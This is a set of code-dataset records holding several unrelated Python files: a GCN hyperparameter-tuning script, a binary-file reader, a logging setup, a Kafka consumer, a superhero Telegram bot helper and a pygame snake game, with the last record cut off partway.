scheduler.step()\n list_train_loss.append(train_loss)\n model, val_loss = validate(model, device, criterion, data_val, bar, args)\n list_val_loss.append(val_loss)\n\n data_test = DataLoader(dict_partition['test'],\n batch_size=args.batch_size,\n shuffle=args.shuffle)\n\n acc, NIH_score_total, pred_NIH_score_total = test(model, device, data_test, args) #원래 acc 가 앞에 있었음.\n \n time_end = time.time()\n time_required = time_end - time_start\n \n args.list_train_loss = list_train_loss\n args.list_val_loss = list_val_loss\n args.NIH_score_total = NIH_score_total\n args.pred_NIH_score_total = pred_NIH_score_total\n args.acc = acc\n args.time_required = time_required\n \n return args\n\ndict_partition = partition(list_feature, list_adj, list_NIH_score, args)\n\n################################################## STEP 4. hyperparameter tuning ################################################\n\n# 4-1. hyperparameter list\nargs.batch_size = 128\nargs.lr = 0.001\nargs.l2_coef = 0\nargs.optim = 'Adam'\nargs.epoch = 30\nargs.n_block = 2\nargs.n_layer = 2\nargs.n_node = 84\nargs.in_dim = 2 #number of node feature\nargs.hidden_dim = 32\nargs.pred_dim1 = 32\nargs.pred_dim2 = 32\nargs.pred_dim3 = 32\nargs.out_dim = 3 #이거 맞아..\nargs.bn = True\nargs.sc = 'no'\nargs.atn = False\nargs.step_size = 10\nargs.gamma = 0.1\nargs.dropout = 0\nargs.num_head = 8\n\n# 4-2. set device\ndevice = torch.device('cuda:1' if torch.cuda.is_available() else 'cpu') #여기 바꿔가면서 실험해야 함\n\n# 4-3. hyperparameter space\nlist_lr = [0.01, 0.001] #, 0.0001, 0.00001]\nlist_n_block = [1, 2] #, 3]\nlist_n_layer = [1, 2] #, 3]\nlist_bn = [False, True]\nlist_sc = ['no', 'sc', 'gsc']\nlist_atn = [False, True]\nlist_hidden_dim = [32, 64] #, 256, 512]\nlist_num_head = [2, 4] #, 8] #, 16]\nlist_pred_dim1 = [32, 64] #, 256]\nlist_pred_dim2 = [32, 64] #, 256]\nlist_pred_dim3 = [32, 64] #, 256]\n\nvar1 = \"lr\"\nvar2 = \"n_block\"\nvar3 = \"n_layer\"\nvar4 = \"bn\"\nvar5 = \"sc\"\nvar6 = \"atn\"\nvar7 = \"hidden_dim\"\nvar8 = \"num_head\"\nvar9 = \"pred_dim1\"\nvar10 = \"pred_dim2\"\nvar11 = \"pred_dim3\"\n\nall_ = [list_lr, list_n_block, list_n_layer, list_bn, list_sc, list_atn, list_hidden_dim, list_num_head,\n list_pred_dim1, list_pred_dim2, list_pred_dim3] \nh_space = [s for s in itertools.product(*all_)]\n\n# 4-4. run!\ndict_result = dict()\nn_iter = 3072*args.epoch*(len(dict_partition['train'])+len(dict_partition['val']))\nbar = tqdm(total=n_iter, file=sys.stdout, position=0)\n\nfor hy in h_space:\n args.lr = hy[0]\n args.n_block = hy[1]\n args.n_layer = hy[2]\n args.bn = hy[3]\n args.sc = hy[4]\n args.atn = hy[5]\n args.hidden_dim = hy[6]\n args.num_head = hy[7]\n args.pred_dim1 = hy[8]\n args.pred_dim2 = hy[9]\n args.pred_dim3 = hy[10]\n exp_name = var1+':'+str(hy[0])+'/'+var2+':'+str(hy[1])+'/'+var3+':'+str(hy[2])+'/'+var4+':'+str(hy[3])+'/'+var5+':'+str(hy[4])+'/'+var6+':'+str(hy[5])+'/'+var7+':'+str(hy[6])+'/'+var8+':'+str(hy[7])+'/'+var9+':'+str(hy[8])+'/'+var10+':'+str(hy[9])+'/'+var11+':'+str(hy[10])\n args.exp_name = exp_name\n result = vars(experiment(dict_partition, device, bar, args))\n print(args.exp_name + \" took \" + str(int(args.time_required)) + \"seconds.\")\n dict_result[args.exp_name] = copy.deepcopy(result)\n \n torch.cuda.empty_cache()\nbar.close()\n\n# 4-5 save exeperiment result\ndf_result = pd.DataFrame(dict_result).transpose()\ndf_result.to_csv('./GCN_result/GCN_hyp_tuning_ADNI_minmax_scaled_label+feature.csv')", "repo_name": "Sangyoon-Bae/PGM_2022_ADNI_PLL", "sub_path": "GCN/multiclass_classification_GCN_acc_minmaxscaler_for_feature.py", "file_name": "multiclass_classification_GCN_acc_minmaxscaler_for_feature.py", "file_ext": "py", "file_size_in_byte": 26440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.setrecursionlimit", "line_number": 3, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "scipy.io.io.loadmat", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.io.io", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.io", "line_number": 39, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 93, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 109, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 110, "usage_type": "attribute"}, {"api_name": "numpy.random.default_rng", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 228, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 228, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 244, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 252, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 252, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 253, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 253, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 254, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 254, "usage_type": "name"}, {"api_name": "torch.nn.Sigmoid", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.mul", "line_number": 261, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 269, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 269, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 277, "usage_type": "name"}, {"api_name": "torch.nn.ParameterList", "line_number": 278, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 280, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 280, "usage_type": "name"}, {"api_name": "torch.FloatTensor", "line_number": 281, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 282, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 283, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 283, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 285, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 285, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 294, "usage_type": "call"}, {"api_name": "torch.einsum", "line_number": 298, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.transpose", "line_number": 299, "usage_type": "call"}, {"api_name": "torch.mul", "line_number": 300, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 304, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 304, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 311, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 311, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 312, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 312, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 312, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 313, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 313, "usage_type": "name"}, {"api_name": "torch.nn.Dropout2d", "line_number": 317, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 317, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 324, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 333, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 333, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 337, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 342, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 342, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 348, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 348, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 367, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 367, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 375, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 377, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 377, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 382, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 387, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 387, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 395, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 395, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 397, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 397, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 408, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 408, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 412, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 412, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 427, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 427, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 430, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 430, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 433, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 433, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 451, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 452, "usage_type": "call"}, {"api_name": "torch.log_softmax", "line_number": 454, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 456, "usage_type": "call"}, {"api_name": "torch.round", "line_number": 462, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 474, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 505, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 521, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 531, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 544, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 551, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 551, "usage_type": "name"}, {"api_name": "torch.optim.RMSprop", "line_number": 555, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 555, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 559, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 559, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 565, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 565, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 567, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 567, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 567, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 574, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 578, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 591, "usage_type": "call"}, {"api_name": "time.time", "line_number": 597, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 637, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 637, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 637, "usage_type": "attribute"}, {"api_name": "itertools.product", "line_number": 666, "usage_type": "call"}, {"api_name": "tqdm.notebook.tqdm", "line_number": 671, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 671, "usage_type": "attribute"}, {"api_name": "copy.deepcopy", "line_number": 689, "usage_type": "call"}, {"api_name": "torch.cuda.empty_cache", "line_number": 691, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 691, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 695, "usage_type": "call"}]}
+{"seq_id": "18233678707", "text": "import datetime\nimport time\n\nmin_int = 2 ** 31\nmax_int = 0\nsum_int = 0\n\nstart_time = time.time()\n\nwith open('file.bin', 'rb') as f:\n\n for i in range(2 ** 9):\n b = f.read(2 ** 22)\n bb = bytearray(b)\n\n for j in range(2 ** 20):\n a = int.from_bytes(bb[4*j:4*j+4], byteorder='big', signed=False)\n if a > max_int:\n max_int = a\n if a < min_int:\n min_int = a\n sum_int += a\n\n b = f.read(2 ** 22)\n\n print(i)\n print('min: ', min_int)\n print('max: ', max_int)\n print('sum: ', sum_int)\n\nprint('min: ', min_int)\nprint('max: ', max_int)\nprint('sum: ', sum_int)\n\nend_time = time.time()\n\nuptime = end_time - start_time\n\nhuman_uptime = str(datetime.timedelta(seconds=int(uptime)))\n\nprint(human_uptime)\n", "repo_name": "koshreality/2gbfile", "sub_path": "read1.py", "file_name": "read1.py", "file_ext": "py", "file_size_in_byte": 817, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "time.time", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 39, "usage_type": "call"}]}
+{"seq_id": "22786439329", "text": "import logging\nimport logging.handlers\nimport time\n\n######### DEBUG LEVELS ##########\nCONSOLE_LEVEL = logging.DEBUG\nFILE_LEVEL = logging.INFO\n#################################\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nformatter.converter = time.gmtime\n\n# Log to console\nch = logging.StreamHandler()\nch.setLevel(CONSOLE_LEVEL)\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# Log to file\nfh = logging.handlers.RotatingFileHandler(\n 'emailchecker.log', maxBytes=1024*2, backupCount=1)\nfh.setLevel(FILE_LEVEL)\nfh.setFormatter(formatter)\nlogger.addHandler(fh)\n", "repo_name": "mrdavidoneill/poweroutcasa", "sub_path": "app/logger.py", "file_name": "logger.py", "file_ext": "py", "file_size_in_byte": 681, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.DEBUG", "line_number": 6, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 7, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 11, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 13, "usage_type": "call"}, {"api_name": "time.gmtime", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 18, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 24, "usage_type": "attribute"}]}
+{"seq_id": "36274169078", "text": "\"\"\"Kafka consumer.\"\"\"\nimport json\nfrom typing import Any, Dict, List, Union\n\nfrom confluent_kafka import Consumer, KafkaError, Message\n\nfrom ..custom_logging import get_logger\nfrom ..pub_sub import Publisher, Subscriber\n\n\nclass KafkaConsumer(Publisher):\n \"\"\"\n Consumer for Kafka, which publishes to all subscribed clients.\n \"\"\"\n\n def __init__(self, bootstrap_servers: str, group_id: str):\n \"\"\"\n Kafka consumer class which implements also the Publisher interface.\n Messages consumed from Kafka should be strings representing valid\n JSON objects.\n\n Parameters\n ----------\n bootstrap_servers: list of str\n addresses of the Kafka servers\n\n group_id: str\n consumer group id\n \"\"\"\n self.__logger = get_logger('consumer-{}'.format(group_id))\n self.subscribers: Dict[str, Subscriber] = dict()\n self.running = False\n\n config = {\n 'bootstrap.servers': bootstrap_servers,\n 'group.id': group_id,\n 'enable.auto.commit': True,\n 'default.topic.config': {\n 'auto.offset.reset': 'smallest'\n },\n }\n self.kafka = Consumer(config)\n\n def kafka_subscribe(self, topic: Union[str, List[str]]):\n if isinstance(topic, list):\n self.kafka.subscribe(topic)\n elif isinstance(topic, str):\n self.kafka.subscribe([topic])\n\n def start_consuming(self):\n \"\"\"\n Start consuming messages from Kafka.\n Every consumed message is then passed to all subscribers.\n \"\"\"\n try:\n self.running = True\n while self.running:\n messages = self.kafka.consume(10, timeout=1.0)\n\n if messages: # consumed some messages from Kafka\n valid_messages = []\n # check every message, if ok send to Subscriber, else log error\n for message in messages:\n err = message.error()\n if err: # error receiving this message\n if err.code() != KafkaError._PARTITION_EOF:\n self.__logger.error(\"Kafka error {}\".format(\n message.error().str()))\n else:\n valid_messages.append(message)\n\n self.__logger.info(\"Valid messages: {}\".format(\n len(valid_messages)))\n for message in valid_messages:\n self.publish(message)\n except (KeyboardInterrupt, SystemExit):\n self.on_shutdown()\n\n def add_subscriber(self, sub_obj, sub_name):\n \"\"\"\n Add subscriber.\n\n Parameters\n ----------\n sub_obj: Subscriber\n the subscriber object\n\n sub_name: str\n name of the subscriber. If already present, raises ValueError\n \"\"\"\n if sub_name not in self.subscribers:\n self.subscribers[sub_name] = sub_obj\n else:\n raise ValueError(\n \"Subscriber with name {} already exists\".format(sub_name))\n\n def remove_subscriber(self, name):\n \"\"\"\n Remove a subscriber by the name `name`.\n\n Parameters\n ----------\n name: str\n name of the subscriber to delete\n \"\"\"\n # removes the subscriber and returns it, or None\n subscriber = self.subscribers.pop(name, None)\n if subscriber is None:\n self.__logger.error(\n \"Trying to remove subscriber with name {}, which does not exist.\"\n .format(name))\n\n def publish(self, message: Any):\n \"\"\"\n Send a message to all subscribers.\n\n Parameters\n ----------\n message: Any\n the message to send\n \"\"\"\n # pylint: disable=E1120\n decoded = self.__decode(message)\n if decoded: # if it's not None :)\n for _, subscriber in self.subscribers.items():\n subscriber.receive(decoded)\n\n def __decode(self, message: Message):\n \"\"\"\n Decode a message coming from Kafka.\n It will become a Python Dict\n \"\"\"\n value = message.value() # can be None, str, bytes\n\n if value:\n value = json.loads(value, encoding='utf-8')\n\n return value\n\n def on_shutdown(self):\n self.running = False\n self.subscribers = None\n self.kafka.close()\n", "repo_name": "PCampi/unimib-simpss", "sub_path": "simpss_persistence/kafka_consumer/consumer.py", "file_name": "consumer.py", "file_ext": "py", "file_size_in_byte": 4525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pub_sub.Publisher", "line_number": 11, "usage_type": "name"}, {"api_name": "custom_logging.get_logger", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "pub_sub.Subscriber", "line_number": 31, "usage_type": "name"}, {"api_name": "confluent_kafka.Consumer", "line_number": 42, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 44, "usage_type": "name"}, {"api_name": "confluent_kafka.KafkaError._PARTITION_EOF", "line_number": 66, "usage_type": "attribute"}, {"api_name": "confluent_kafka.KafkaError", "line_number": 66, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 113, "usage_type": "name"}, {"api_name": "confluent_kafka.Message", "line_number": 128, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 136, "usage_type": "call"}]}
+{"seq_id": "74392132248", "text": "import requests\nimport const\n\n\nclass SendManager:\n\n def __init__(self, hero_manager, bot, chat_id):\n for one_hero in hero_manager.heroes:\n text_message = '' + one_hero.name + ' ' + '\\n' + \\\n 'Biography ' + '\\n' + \\\n 'Full name: ' + one_hero.full_name + '\\n' + \\\n 'Alter egos: ' + one_hero.alter_egos + '\\n' + \\\n 'Aliases: ' + one_hero.aliases + '\\n' + \\\n 'Place of birth: ' + one_hero.aliases + '\\n' + \\\n 'First appearance: ' + one_hero.first_appearance + '\\n' + \\\n 'Publisher: ' + one_hero.publisher + '\\n' + \\\n 'Appearance ' + '\\n' + \\\n 'Gender: ' + one_hero.gender + '\\n' + \\\n 'Race: ' + one_hero.race + '\\n' + \\\n 'Height: ' + one_hero.height + '\\n' + \\\n 'Weight: ' + one_hero.weight + '\\n' + \\\n 'Eye color: ' + one_hero.eye_color + '\\n' + \\\n 'Hair color: ' + one_hero.hair_color + '\\n' + \\\n 'Work ' + '\\n' + \\\n 'Occupation: ' + one_hero.occupation + '\\n' + \\\n 'Base: ' + one_hero.base + '\\n' + \\\n 'Connections ' + '\\n' + \\\n 'Group affiliation: ' + one_hero.group_affiliation + '\\n' + \\\n 'Relatives: ' + one_hero.relatives + '\\n'\n bot.send_photo(chat_id, one_hero.image, caption=text_message, parse_mode='HTML')\n\n\nclass HeroManager:\n\n def __init__(self, heroes_name):\n self.__session = requests.Session()\n self.hero_selected = False\n self.hero_count = 0\n self.error = None\n self.heroes = []\n self.__get_hero_by_name(heroes_name)\n\n def __get_hero_by_name(self, heroes_name):\n res = self.__session.get(const.url + '/search/' + heroes_name)\n try:\n if res.status_code != 200:\n self.error = 'Please try again later'\n raise Exception\n elif res.json()['response'] != 'success':\n self.error = res.json()['error'].capitalize()\n raise Exception\n hero_list = res.json()['results']\n for one_hero in hero_list:\n self.hero_selected = True\n self.hero_count += 1\n self.heroes.append(Hero(one_hero, self.__session))\n except Exception as ex:\n print(ex)\n\n\nclass Appearance(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__appearance = one_hero['appearance']\n self.gender = self.__appearance['gender']\n self.race = self.__appearance['race']\n self.height = ' / '.join(str(i) for i in (self.__appearance['height']))\n self.weight = ' / '.join(str(i) for i in (self.__appearance['weight']))\n self.eye_color = self.__appearance['eye-color']\n self.hair_color = self.__appearance['hair-color']\n\n\nclass Biography(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__biography = one_hero['biography']\n self.full_name = self.__biography['full-name']\n self.alter_egos = self.__biography['alter-egos']\n self.aliases = ', '.join(str(i) for i in (self.__biography['aliases']))\n self.place_of_birth = self.__biography['place-of-birth']\n self.first_appearance = self.__biography['first-appearance']\n self.publisher = self.__biography['publisher']\n\n\nclass Connections(object):\n def __init__(self, one_hero):\n super().__init__(one_hero)\n self.__connections = one_hero['connections']\n self.relatives = self.__connections['relatives']\n self.group_affiliation = self.__connections['group-affiliation']\n\n\nclass Work(object):\n def __init__(self, one_hero):\n self.__connections = one_hero['work']\n self.occupation = self.__connections['occupation']\n self.base = self.__connections['base']\n\n\nclass Hero(Appearance, Biography, Connections, Work):\n def __init__(self, one_hero, sess):\n super().__init__(one_hero)\n self.id = one_hero['id']\n self.name = one_hero['name']\n self.image = self.load_image(sess, one_hero['image']['url'])\n\n @staticmethod\n def load_image(sess, url):\n r = sess.get(url)\n if r.status_code == 200:\n return r.content\n else:\n return None\n", "repo_name": "BigForLy/SuperHeroInTelegram", "sub_path": "heroes_manager.py", "file_name": "heroes_manager.py", "file_ext": "py", "file_size_in_byte": 4644, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.Session", "line_number": 36, "usage_type": "call"}, {"api_name": "const.url", "line_number": 44, "usage_type": "attribute"}]}
+{"seq_id": "1010725129", "text": "#https://www.youtube.com/watch?v=rtwtOcfYKqc 출처 이수안컴퓨터연구소 유튜브\n\n\nimport pygame\n\nimport sys\n\nimport time\n\nimport random # import함수로 이미 만들어진 복잡한 함수를 끌어옴\n\n \n\n \n\nfrom pygame.locals import *\n\n \n\nWINDOW_WIDTH = 800\n\nWINDOW_HEIGHT = 600\n\nGRID_SIZE = 20\n\nGRID_WIDTH = WINDOW_WIDTH / GRID_SIZE\n\nGID_HEIGHT= WINDOW_HEIGHT / GRID_SIZE #게임화면의 크기설정\n\n \n\nWHITE = (255, 255, 255)\n\nGREEN = (0, 50, 0)\n\nORANGE = (250, 150, 0) #게임속 오브젝트의 색상 설정\n\n \n\nUP = (0, -1)\n\nDOWN = (0, 1)\n\nLEFT = (-1, 0)\n\nRIGHT = (1, 0) #게임의 메인오브젝트인 지렁이의 움직임 값 설정\n\n \n\nFPS = 10 #게임화면 프레임 설정\n\n \n\nclass Python(object): #object라는 클래스를 class함수로 설정 -지렁이\n\n def __init__(self): #def함수로 사용할self함수를 만듬\n\n self.create()\n\n self.color = GREEN #object개체의 색상설정\n\n \n\n def create(self):\n\n self.length = 2\n\n self.positions = [((WINDOW_WIDTH / 2), (WINDOW_HEIGHT / 2))]\n\n self.direction = random.choice([UP, DOWN, LEFT, RIGHT]) #object의 움직임 설정\n\n \n\n def contorl(self, xy): #contorl함수 설정\n\n if (xy[0] * -1, xy[1] * -1) == self.direction:\n\n return\n\n else:\n\n self.direction = xy\n\n \n\n def move(self): #move함수 설정\n\n cur = self.positions[0]\n\n x, y = self.direction\n\n new = (((cur[0] + (x * GRID_SIZE)) % WINDOW_WIDTH), (cur[1] + (y * GRID_SIZE)) % WINDOW_HEIGHT)\n\n if new in self.positions[2:]:\n\n self.create()\n\n else:\n\n self.positions.insert(0, new)\n\n if len(self.positions) >self.length:\n\n self.positions.pop()\n\n \n\n def eat(self): #eat 함수설정\n\n self.length += 1\n\n \n\n def draw(self, surface): #draw함수설정\n\n for p in self.positions:\n\n draw_object(surface, self.color, p) \n\n \n\nclass Feed(object): #Feed라는객체생성 -지렁이가먹을 점\n\n def __init__(self):\n\n self.position = (0, 0)\n\n self.color = ORANGE\n\n self.create()\n\n \n\n def create(self): #랜��하게 생성되도록 random 모듈을 불러와서 설정해줌\n\n self.position = (random.randint(0, GRID_WIDTH - 1) * GRID_SIZE, random.randint(0, GID_HEIGHT - 1) *GRID_SIZE)\n\n \n\n def draw(self, surface):\n\n draw_object(surface, self.color, self.position)\n\n \n\ndef draw_object(surface, color, pos):\n\n r = pygame.Rect((pos[0], pos[1]), (GRID_SIZE, GRID_SIZE))\n\n pygame.draw.rect(surface, color, r)\n\n \n\ndef check_eat(python, feed):\n\n if python.positions[0] == feed.position:\n\n python.eat()\n\n feed.create()\n\n \n\n \n\n \n\nif __name__ == '__main__':\n\n python = Python() #지렁이\n\n feed = Feed() #점\n\n \n\n \n\n \n\n pygame.init()\n\n window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)\n\n pygame.display.set_caption('Python Game')\n\n surface = pygame.Surface(window.get_size())\n\n surface = surface.convert()\n\n surface.fill(WHITE)\n\n clock = pygame.time.Clock()\n\n pygame.key.set_repeat(1, 40)\n\n window.blit(surface, (0, 0))\n\n \n\n while True: #반복문을 사용해줌으로써 게임을 중지하기전까지 계속됨\n\n \n\n for event in pygame.event.get():\n\n if event.type == QUIT:\n\n pygame.quit()\n\n sys.exit()\n\n elif event.type == KEYDOWN:\n\n if event.key == K_UP: #방향키를 누르면 움직이도록 방향키에 함수를 할당해줌\n\n pygame.control(UP)\n\n elif event.key == K_DOWN:\n\n pygame.control(DOWN)\n\n elif event.key == K_LEFT:\n\n pygame.control(LEFT)\n\n elif event.key == K_RIGHT:\n\n pygame.control(RIGHT)\n\n \n\n surface.fill(WHITE) #배경화면 색 설정\n\n python.move() #지렁이가 움직일 때 사용할 함수 할당\n\n check_eat(python, feed) #지렁이가 점을 먹을떄마다 길어지도록 할당\n\n speed = (FPS + python.length) / 2 #지렁이가 길어질때마다 속도가 올라가도록 할당\n\n python.draw(surface) #화면에 지렁이가 나타나게 해줌\n\n feed.draw(surface) #화면에 점이 나타나게 해줌\n\n window.blit(surface, (0, 0))\n\n pygame.display.flip()\n\n pygame.display.update()\n\n clock.tick(speed)", "repo_name": "bidulgi9g9/Practice3", "sub_path": "FirstGame.py", "file_name": "FirstGame.py", "file_ext": "py", "file_size_in_byte": 4483, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": 